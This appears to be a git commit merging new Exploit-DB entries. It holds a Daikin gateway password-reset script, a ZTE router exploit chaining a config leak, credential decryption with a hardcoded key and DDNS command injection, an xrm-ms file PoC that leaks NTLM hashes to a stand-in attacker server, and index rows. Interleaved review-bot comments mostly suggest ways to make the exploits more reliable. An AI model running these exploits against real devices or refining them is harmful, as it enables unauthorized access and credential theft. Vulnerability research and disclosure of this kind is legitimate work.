Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-05-03 00:02:49 +00:00
commit 23961d7132
5 changed files with 502 additions and 0 deletions


@ -0,0 +1,55 @@
# Daikin Security Gateway 214 - Remote Password Reset
# Vendor: Daikin Industries, Ltd.
# Product web page: https://www.daikin.com
# https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
# Affected version: App: 100, Frm: 214
#
# Summary: The Security gateway allows the iTM and LC8 controllers
# to connect through the Security gateway to the Daikin Cloud Service.
# Instead of sending the report to the router directly, the iTM or
# LC8 controller sends the report to the Security gateway first. The
# Security gateway transforms the report format from http to https
# and then sends the transformed https report to the Daikin Cloud
# Service via the router. Built-in LAN adapter enabling online control.
#
# Desc: The Daikin Security Gateway exposes a critical vulnerability
# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
# attacker can send a crafted POST request to this endpoint, bypassing
# authentication mechanisms. Successful exploitation resets the system
# credentials to the default Daikin:Daikin username and password combination.
# This allows attackers to gain unauthorized access to the system without
# prior credentials, potentially compromising connected devices and networks.
#
# Tested on: fasthttp
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5931
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
#
#
# 21.03.2025
#
[ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; }
TARGET_IP="$1"
URL="https://$TARGET_IP/api/settings/password/reset"
PAYLOAD="t00t"
[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; }
RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null)
[ $? -ne 0 ] && { echo "Cant reach $TARGET_IP."; exit 1; }
if [[ $RESPONSE =~ \"Error\":0 ]]; then
echo "Reset worked! Vulnerable."
elif [[ $RESPONSE =~ \"Error\":1 ]]; then
echo "Not vulnerable."
else
echo "Got: $RESPONSE"
fi
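Review bot: Running this "check" is destructive on a vulnerable target — the POST to `/api/settings/password/reset` actually resets the appliance login to Daikin:Daikin, yet the script asks for no confirmation and has no dry-run, so anyone sweeping a range with it locks out the real administrator. Gate the request before the curl line: `read -rp "This resets the gateway login to Daikin:Daikin. Continue? [y/N] " ok; [[ $ok == [yY] ]] || exit 1`. The curl call also sets no timeout, so a filtered or half-open host stalls the script for minutes; add `--connect-timeout 10 --max-time 30`, and since the `-k` is there to accept the appliance's self-signed certificate, a comment saying so keeps the next reader from "fixing" it. The IPv4-only regex rejects hostnames, which is fine for a PoC but worth stating in the usage message.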

303
exploits/multiple/local/52279.py Executable file

@ -0,0 +1,303 @@
# Exploit Title: ZTE ZXV10 H201L - RCE via authentication bypass
# Exploit Author: l34n (tasos meletlidis)
# https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES
def login(session, host, port, username, password):
login_token = session.get(f"http://{host}:{port}/").text.split("getObj(\"Frm_Logintoken\").value = \"")[1].split("\"")[0]
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"Username": username,
"Password": password,
"frashnum": "",
"Frm_Logintoken": login_token
}
session.post(f"http://{host}:{port}/", headers=headers, data=data)
def logout(session, host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"logout": "1",
}
session.post(f"http://{host}:{port}/", headers=headers, data=data)
def leak_config(host, port):
conn = http.client.HTTPConnection(host, port)
boundary = "----WebKitFormBoundarysQuwz2s3PjXAakFJ"
body = (
f"--{boundary}\r\n"
'Content-Disposition: form-data; name="config"\r\n'
"\r\n"
"\r\n"
f"--{boundary}--\r\n"
)
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Content-Length": str(len(body)),
"Connection": "close",
}
conn.request("POST", "/getpage.gch?pid=101", body, headers)
response = conn.getresponse()
response_data = response.read()
with open("config.bin", "wb") as file:
file.write(response_data)
conn.close()
def _read_exactly(fd, size, desc="data"):
chunk = fd.read(size)
if len(chunk) != size:
return None
return chunk
def _read_struct(fd, fmt, desc="struct"):
size = struct.calcsize(fmt)
data = _read_exactly(fd, size, desc)
if data is None:
return None
return struct.unpack(fmt, data)
def read_aes_data(fd_in, key):
encrypted_data = b""
while True:
aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
if aes_hdr is None:
return None
_, chunk_len, marker = aes_hdr
chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
if chunk is None:
return None
encrypted_data += chunk
if marker == 0:
break
cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
fd_out = BytesIO()
fd_out.write(cipher.decrypt(encrypted_data))
fd_out.seek(0)
return fd_out
def read_compressed_data(fd_in, enc_header):
hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
if enc_header[6] != hdr_crc:
return None
total_crc = 0
fd_out = BytesIO()
while True:
comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
if comp_hdr is None:
return None
uncompr_len, compr_len, marker = comp_hdr
chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
if chunk is None:
return None
total_crc = zlib.crc32(chunk, total_crc)
uncompressed = zlib.decompress(chunk)
if len(uncompressed) != uncompr_len:
return None
fd_out.write(uncompressed)
if marker == 0:
break
if enc_header[5] != total_crc:
return None
fd_out.seek(0)
return fd_out
def read_config(fd_in, fd_out, key):
ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
if ver_header_1 is None:
return
ver_header_2_offset = 0x14 + ver_header_1[4]
fd_in.seek(ver_header_2_offset)
ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
if ver_header_2 is None:
return
ver_header_3_offset = ver_header_2[10]
fd_in.seek(ver_header_3_offset)
ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
if ver_header_3 is None:
return
signed_cfg_size = ver_header_3[3]
file_size = stat(fd_in.name).st_size
fd_in.seek(0x80)
sign_header = _read_struct(fd_in, ">3I", desc="signature header")
if sign_header is None:
return
if sign_header[0] != 0x04030201:
return
sign_length = sign_header[2]
signature = _read_exactly(fd_in, sign_length, desc="signature")
if signature is None:
return
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = encryption_header[1]
if enc_type in (1, 2):
if not key:
return
fd_in = read_aes_data(fd_in, key)
if fd_in is None:
return
if enc_type == 2:
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = 0
if enc_type == 0:
fd_in = read_compressed_data(fd_in, encryption_header)
if fd_in is None:
return
fd_out.write(fd_in.read())
def decrypt_config(config_key):
encrypted = open("config.bin", "rb")
decrypted = open("decrypted.xml", "wb")
read_config(encrypted, decrypted, config_key)
with open("decrypted.xml", "r") as file:
contents = file.read()
username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
encrypted.close()
os.system("rm config.bin")
decrypted.close()
os.system("rm decrypted.xml")
return username, password
def command_injection(cmd):
injection = f"user;{cmd};echo "
injection = injection.replace(" ", "${IFS}")
return injection
def set_ddns(session, host, port, payload):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "apply",
"IF_ERRORSTR": "SUCC",
"IF_ERRORPARAM": "SUCC",
"IF_ERRORTYPE": -1,
"IF_INDEX": None,
"IFservice_INDEX": 0,
"IF_NAME": None,
"Name": "dyndns",
"Server": "http://www.dyndns.com/",
"ServerPort": None,
"Request": None,
"UpdateInterval": None,
"RetryInterval": None,
"MaxRetries": None,
"Name0": "dyndns",
"Server0": "http://www.dyndns.com/",
"ServerPort0": 80,
"Request0": "",
"UpdateInterval0": 86400,
"RetryInterval0": 60,
"MaxRetries0": 3,
"Name1": "No-IP",
"Server1": "http://www.noip.com/",
"ServerPort1": 80,
"Request1": "",
"UpdateInterval1": 86400,
"RetryInterval1": 60,
"MaxRetries1": 3,
"Name2": "easyDNS",
"Server2": "https://web.easydns.com/",
"ServerPort2": 80,
"Request2": "",
"UpdateInterval2": 86400,
"RetryInterval2": 180,
"MaxRetries2": 5,
"Enable": 1,
"Hidden": None,
"Status": None,
"LastError": None,
"Interface": "IGD.WD1.WCD3.WCIP1",
"DomainName": "hostname",
"Service": "dyndns",
"Username": payload,
"Password": "password",
"Offline": None,
"HostNumber": ""
}
session.post(f"http://{host}:{port}/getpage.gch?pid=1002&nextpage=app_ddns_conf_t.gch", headers=headers, data=data)
def pwn(config_key, host, port):
session = requests.Session()
leak_config(host, port)
username, password = decrypt_config(config_key)
login(session, host, port, username, password)
shellcode = "echo hacked>/var/tmp/pwned"
payload = command_injection(shellcode)
set_ddns(session, host, port, payload)
logout(session, host, port)
print("[+] PoC complete")
def main():
parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXV10 H201L")
parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"Renjx%2$CjM", help="Leaked config encryption key from cspd")
parser.add_argument("--host", required=True, help="Target IP address of the router")
parser.add_argument("--port", required=True, type=int, help="Target port of the router")
args = parser.parse_args()
pwn(args.config_key, args.host, args.port)
if __name__ == "__main__":
main()
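Review bot: `pwn` prints "[+] PoC complete" unconditionally — `login` and `set_ddns` discard the result of their `session.post` calls, so a stale `Frm_Logintoken`, wrong credentials or a rejected DDNS form all report success while nothing was injected. Have both helpers return the response (`r = session.post(...); r.raise_for_status(); return r`) and have `pwn` confirm the login actually succeeded (e.g. the post-login page no longer carries the login form — presumably the token marker, verify against the device) before sending the payload. In `decrypt_config`, `read_config` bails out with a bare `return` on every malformed header or wrong key, leaving an empty decrypted.xml that then fails with an opaque IndexError at the `split("IGD.AU2")` line; raise a descriptive exception at each early return instead. Also replace `os.system("rm config.bin")` / `os.system("rm decrypted.xml")` with `os.remove(...)` inside a `try/finally` around the parsing so the leaked router config is not left on disk when decryption fails, and give every `requests` call a `timeout=` so a filtered port does not hang the PoC indefinitely.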


@ -0,0 +1,104 @@
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt
# x.com/hyp3rlinx
# ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
.xrm-ms File Type
[Vulnerability Type]
NTLM Hash Disclosure (Spoofing)
[Video URL PoC]
https://www.youtube.com/watch?v=d5U_krLQbNY
[CVE Reference]
N/A
[Security Issue]
The Windows XRM-MS file type is related to Microsofts software licensing infrastructure.
C:\> assoc .xrm-ms=MSSppLicenseFile.
An "xrm-ms" digital license file opens default (times a tickin) in Internet Explorer (MSIE) and on later OS versions switches to MS Edge.
The ".xrm-ms" file format allows injecting XML stylesheets that will then get processed, when a user opens it.
Adversaries can reference UNC paths for the stylesheet HREF tag that points to LAN network share or attacker controlled infrastructure.
This results in an outbound connection to the attacker controlled network share and or server, leaking the target NTLM hash.
Works from both a LAN network share perspective or remote forced drive-by download to a target etc. User interaction is required to open the file.
During testing, xrm-ms file type not blocked by Windows Office Outlook client 2016 and a popular Email Gateway Security product as of few days ago.
Xrm-Ms File points:
1) XRM-MS is not considered dangerous file type
2) Defaults to open in either MSIE or Edge Win7/10/11/Server 2019
3) Default Icon as it is Windows browser may make it appear more "trust-worthy"
4) Throws no errors from the stylesheet directive when processed
5) May bypass some inbound email security inspections
6) No MOTW roadblocks
7) No active content security warnings
Tested successfully in Win7/Win10/Server 2019
Mileage may vary on Windows 11 and or recently updated systems.
[Exploit/POC]
Delivery options:
Drive-by force download
Email
Network Share
Archive .zip etc
1) Create .xrm-ms File with following content, adjust attacker server information. Actually, all you need is the one XML stylesheet to trigger it.
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="\\ATTACKER-SERVER\NTLMhashLeakDontMeetMSRCBarPoC" ?>
<r:license xmlns:r="http://www.microsoft.com/DRM/rightsManager">
<r:licenseID>12345-67890-ABCDE</r:licenseID>
<r:productName>Windows(R) Operating System, VOLUME_KMSCLIENT channel</r:productName>
<r:productKeyID>XXXXX-XXXXX-XXXXX-XXXXX-XXXXX</r:productKeyID>
<r:hardwareBinding>
<r:hash>AA11BB22CC33DD44EE55</r:hash>
</r:hardwareBinding>
<r:validity>
<r:validFrom>2024-01-01T00:00:00</r:validFrom>
<r:validUntil>2025-01-01T00:00:00</r:validUntil>
</r:validity>
<r:signature>...</r:signature>
</r:license>
[Network Access]
Remote
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: April 17, 2025
MSRC response: "report is a moderate spoofing and doesn't meet the bar." April 29, 2025
April 30, 2025 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content copyright (c).
hyp3rlinx
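Review bot: The advisory explains the leak path (an `xml-stylesheet` href pointing at a UNC path makes the browser authenticate to the attacker's share) but, since MSRC declined to fix it, gives defenders nothing to act on — a mitigation section is the missing piece. I would add a `[Mitigation]` block after [Severity] noting that the leak needs an outbound SMB connection to the attacker host, so egress filtering of TCP 445 and the "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy are the usual controls, and that the `.xrm-ms` association can be re-pointed away from the browser or the extension blocked at the mail gateway — the advisory itself reports it passed Outlook 2016 and a gateway product. The platform statements also disagree: point 2 lists Win7/10/11/Server 2019 as defaulting to the browser, while the test line says Win7/Win10/Server 2019 with Windows 11 "may vary"; align point 2 with what was actually tested.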


@ -0,0 +1,36 @@
# Exploit title: Microsoft - NTLM Hash Disclosure Spoofing (library-ms)
# Exploit Author: John Page (aka hyp3rlinx)
# x.com/hyp3rlinx
# ISR: ApparitionSec
Back in 2018, I reported a ".library-ms" File NTLM information disclosure vulnerability to MSRC and was told "it was not severe enough", that being said I post it anyways.
Seven years passed, until other researchers re-reported it.
Subsequently this security flaw was finally deemed important by Microsoft and it received CVE-2025-24054, for which I was finally retroactively credited as the original reporter.
Circa 2025 updated:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054
[References]
https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt
https://packetstorm.news/files/id/148556/
https://cxsecurity.com/issue/WLB-2018070160
[Network Access]
Remote
[Original Disclosure Timeline]
Vendor Notification: Jun 29, 2018
MSRC Response: Jul 12, 2018 "risk is not severe enough to justify immediate servicing."
July 14, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content copyright (c).
hyp3rlinx


@ -10453,6 +10453,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple,,2003-03-19,2012-11-15,1,OSVDB-3242,,,,,https://www.securityfocus.com/bid/7808/info 22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple,,2003-03-19,2012-11-15,1,OSVDB-3242,,,,,https://www.securityfocus.com/bid/7808/info
48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,,2020-03-10,2020-03-10,0,,,,http://www.exploit-db.com/screenshots/idlt48500/1-0simwojvzjsolm4job-l5w.png,,https://medium.com/@stdio__/cs-go-0days-or-why-all-or-nothing-bug-bounty-programs-are-bad-cce144a5013 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,,2020-03-10,2020-03-10,0,,,,http://www.exploit-db.com/screenshots/idlt48500/1-0simwojvzjsolm4job-l5w.png,,https://medium.com/@stdio__/cs-go-0days-or-why-all-or-nothing-bug-bounty-programs-are-bad-cce144a5013
7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple,,2008-12-21,2017-01-05,1,CVE-2008-5377;OSVDB-50637,,,,, 7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple,,2008-12-21,2017-01-05,1,CVE-2008-5377;OSVDB-50637,,,,,
52278,exploits/multiple/local/52278.txt,"Daikin Security Gateway 14 - Remote Password Reset",2025-05-01,LiquidWorm,local,multiple,,2025-05-01,2025-05-01,0,,,,,,
47175,exploits/multiple/local/47175.sh,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2018-12-30,bcoles,local,multiple,,2019-07-26,2019-07-26,0,,,,,,https://github.com/bcoles/local-exploits/blob/93082cc81cf9998a2aea1a48f8ddb8fe01a74a66/lastore-daemon-root/lastore-daemon-root.sh 47175,exploits/multiple/local/47175.sh,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2018-12-30,bcoles,local,multiple,,2019-07-26,2019-07-26,0,,,,,,https://github.com/bcoles/local-exploits/blob/93082cc81cf9998a2aea1a48f8ddb8fe01a74a66/lastore-daemon-root/lastore-daemon-root.sh
19497,exploits/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",local,multiple,,1999-09-13,2012-07-01,1,CVE-1999-0691;OSVDB-1071,,,,,https://www.securityfocus.com/bid/635/info 19497,exploits/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",local,multiple,,1999-09-13,2012-07-01,1,CVE-1999-0691;OSVDB-1071,,,,,https://www.securityfocus.com/bid/635/info
11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple,,2010-01-05,,0,,,,,, 11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple,,2010-01-05,,0,,,,,,
@ -10604,6 +10605,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple,,2009-07-08,,1,OSVDB-55971,,,,, 9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple,,2009-07-08,,1,OSVDB-55971,,,,,
51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,, 51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz, 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,,
32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info 32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info 24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info 22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info
@ -40991,6 +40993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17502,exploits/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,local,windows,,2011-07-07,2011-07-07,1,OSVDB-73627;CVE-2010-5299,"Metasploit Framework (MSF)",,,http://www.exploit-db.commicrop_0.1.1.1600.zip, 17502,exploits/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,local,windows,,2011-07-07,2011-07-07,1,OSVDB-73627;CVE-2010-5299,"Metasploit Framework (MSF)",,,http://www.exploit-db.commicrop_0.1.1.1600.zip,
14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,,2010-08-23,2010-08-24,1,OSVDB-73627;CVE-2010-5299,,,http://www.exploit-db.com/screenshots/idlt15000/14720.png,http://www.exploit-db.commicrop_0.1.1.1600.zip, 14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,,2010-08-23,2010-08-24,1,OSVDB-73627;CVE-2010-5299,,,http://www.exploit-db.com/screenshots/idlt15000/14720.png,http://www.exploit-db.commicrop_0.1.1.1600.zip,
12213,exploits/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Local Privilege Escalation",2010-04-14,MJ0011,local,windows,,2010-04-13,,0,OSVDB-64951,,,,, 12213,exploits/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Local Privilege Escalation",2010-04-14,MJ0011,local,windows,,2010-04-13,,0,OSVDB-64951,,,,,
52280,exploits/windows/local/52280.txt,"Microsoft - NTLM Hash Disclosure Spoofing (library-ms)",2025-05-01,hyp3rlinx,local,windows,,2025-05-01,2025-05-01,0,CVE-2025-24054,,,,,
33892,exploits/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,local,windows,,2014-06-27,2014-06-27,1,CVE-2014-0257;OSVDB-103163;MS14-009,"Metasploit Framework (MSF)",,,, 33892,exploits/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,local,windows,,2014-06-27,2014-06-27,1,CVE-2014-0257;OSVDB-103163;MS14-009,"Metasploit Framework (MSF)",,,,
14745,exploits/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,, 14745,exploits/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-12-04-at-205544.png,, 40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-12-04-at-205544.png,,
@ -41227,6 +41230,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40764,exploits/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",local,windows,,2016-11-15,2016-11-15,1,CVE-2016-7225;MS16-138,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=915 40764,exploits/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",local,windows,,2016-11-15,2016-11-15,1,CVE-2016-7225;MS16-138,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=915
49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,,2020-12-02,2020-12-02,0,,,,,, 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,,2020-12-02,2020-12-02,0,,,,,,
46098,exploits/windows/local/46098.txt,"Microsoft Windows - Windows Error Reporting Local Privilege Escalation",2019-01-02,SandboxEscaper,local,windows,,2019-01-09,2019-01-09,0,,,,,,https://github.com/SandboxEscaper/randomrepo/blob/d3dbac51bf084c19064bb0f27fbcc800f2e6fe56/angrypolarbearbug.rar 46098,exploits/windows/local/46098.txt,"Microsoft Windows - Windows Error Reporting Local Privilege Escalation",2019-01-02,SandboxEscaper,local,windows,,2019-01-09,2019-01-09,0,,,,,,https://github.com/SandboxEscaper/randomrepo/blob/d3dbac51bf084c19064bb0f27fbcc800f2e6fe56/angrypolarbearbug.rar
52277,exploits/windows/local/52277.txt,"Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing",2025-05-01,hyp3rlinx,local,windows,,2025-05-01,2025-05-01,0,,,,,,
47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,,2020-01-01,2020-02-07,1,,,,,, 47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,,2020-01-01,2020-02-07,1,,,,,,
50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",2022-01-12,hyp3rlinx,local,windows,,2022-01-12,2022-01-12,0,,,,,, 50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",2022-01-12,hyp3rlinx,local,windows,,2022-01-12,2022-01-12,0,,,,,,
46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows,,2019-05-23,2019-05-23,0,,,,,,https://github.com/SandboxEscaper/polarbearrepo/tree/763b757ead0ee8043a7edb5fdc2d437ae0f7b009/InstallerBypass 46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows,,2019-05-23,2019-05-23,0,,,,,,https://github.com/SandboxEscaper/polarbearrepo/tree/763b757ead0ee8043a7edb5fdc2d437ae0f7b009/InstallerBypass
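Review bot: The new Daikin row records the product as "Daikin Security Gateway 14", but the exploit header itself says "Security Gateway 214" and "Frm: 214", so the index will not match the affected firmware; change the description to `"Daikin Security Gateway 214 - Remote Password Reset"`. Both the Daikin and ZTE entries are typed `local` although each is reached over the network (an unauthenticated HTTPS POST, and an HTTP config leak followed by DDNS command injection) — `remote`, with the port column filled where known (443 for the Daikin gateway), would reflect the PoCs, whereas the xrm-ms and library-ms rows are correctly `local` since they require a user to open a file.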
